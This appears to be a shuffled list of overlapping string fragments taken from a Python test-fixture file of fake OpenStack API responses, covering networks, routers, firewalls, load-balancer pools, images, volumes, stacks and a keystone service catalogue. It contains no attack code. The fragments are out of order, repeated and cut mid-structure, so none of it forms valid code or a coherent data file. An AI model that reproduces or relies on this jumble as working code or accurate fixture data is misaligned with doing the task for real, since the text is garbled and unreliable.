"\"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [],",
"\"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None,",
"\"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] }",
"\"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\":",
"= { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\":",
"\"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0]",
"= 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT =",
"\"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\":",
"IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT",
"0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792,",
"{ \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1],",
"'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0',",
"\"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\":",
"\"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\":",
"\"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\":",
"}, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\":",
"'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT,",
"'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' },",
"} ] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\",",
"\"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ]",
"[ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\":",
"}, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\",",
"\"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\":",
"\"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\":",
"u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type':",
"\"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups',",
"'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant':",
"[ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, {",
"} ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ {",
"STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\"",
"\"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = {",
"\"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\":",
"{ \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\":",
"\"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\",",
"# # Copyright © 2014 Cloudwatt # # Licensed under the Apache License,",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\":",
"[], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL':",
"SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\":",
"{ \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] },",
"= 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT =",
"\"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\":",
"\"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = {",
"\"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0]",
"'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type':",
"\"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\":",
"\"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\":",
"label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label",
"\"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST",
"u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = {",
"[], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [],",
"LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1,",
"\"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\":",
"\"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\",",
"NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\":",
"{ \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\":",
"\"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ {",
"[\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, {",
"\"fake\" } ] } IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\":",
"u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [",
"} FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID,",
"False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\",",
"'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777',",
"\"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\":",
"FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\":",
"\"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\",",
"None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = {",
"= [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"]",
"\"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] }",
"\"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [",
"\"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\",",
"'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name':",
"None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID",
"{ \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ]",
"True } ] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security",
"[{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container':",
"service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description':",
"agreed to in writing, software # distributed under the License is distributed on",
"{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0',",
"\"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0],",
"'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2'",
"test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID,",
"'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1'",
"} ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\":",
"\"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\",",
"'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id':",
"\"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, {",
"\"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5,",
"[ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\":",
"\"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\":",
"\"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\":",
"\"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\"",
"'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74',",
"\"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\",",
"None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\":",
"\"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\":",
"], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\",",
"}, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"} SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily",
"None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\",",
"14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\":",
"\"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\":",
"\"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ]",
"VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\",",
"'', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID,",
"PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\":",
"} ] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0],",
"0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\":",
"\"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None,",
"False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST =",
"limitations # under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID =",
"NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, { 'endpoints':",
"\"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\",",
"}, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\",",
"[{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"\"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\":",
"{ \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14,",
"\"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False",
"to in writing, software # distributed under the License is distributed on an",
"} ] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID,",
"\"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\":",
"\"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\":",
"\"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\":",
"ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': {",
"\"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] +",
"[{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}]",
"'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\",",
"\"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ],",
"= [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS =",
"'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, {",
"{ \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = {",
"None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID,",
"\"shared\": False } ] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\",",
"\"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" }",
"\"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\"",
"} ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\":",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, {",
"\"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\":",
"= [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An",
"None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST",
"\"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"]",
"\"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\":",
"\"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None,",
"\"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\":",
"\"License\"); you may # not use this file except in compliance with the",
"} ] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\",",
"{ \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\",",
"STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\", \"links\": [ { \"href\":",
